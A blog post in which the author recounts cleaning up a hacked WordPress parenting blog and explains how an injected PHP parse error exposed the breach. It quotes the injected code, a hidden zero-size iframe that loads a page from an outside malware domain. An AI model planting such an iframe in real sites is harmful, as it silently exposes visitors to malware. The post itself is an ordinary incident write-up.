WordPress Parse error: syntax error, unexpected ‘<' in index.php on line 5

My mother’s blog — Adventures in Parenting.org — was hacked today. It took a couple hours to do the research and fix the site, but I think things have mostly settled down now. Unfortunately, it’s impossible to know — without re-doing the entire site — that everything is completely clean. So comb through the site, and let me know right away if you see anything suspicious.

The point of the attack was adding the following code to the bottom of many files:

<iframe src=”http:// google-analyze.org /lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

google-analyze.org is a malware site. Don’t go there.

Fortunately (or not), the hacker or worm also added that bit of code to the bottom of the root index.php, which didn’t have a closing PHP tag (?>). That means the parse error (which is this post’s title) was showing up instead of the site. This was both a good and bad thing.

It was a bad thing because it caused the site to become inaccessible.

It was a good thing because it signaled to my mother that the site had a problem.

This was a mistake on the hacker (or worm)’s part. They wanted the hack to be silent, so that they could sneakily infect site visitors with the malware from their site. If the hacker hadn’t made this mistake, we might not have realized the breach until a long time later.

Has your site ever been hacked? How did you deal with it?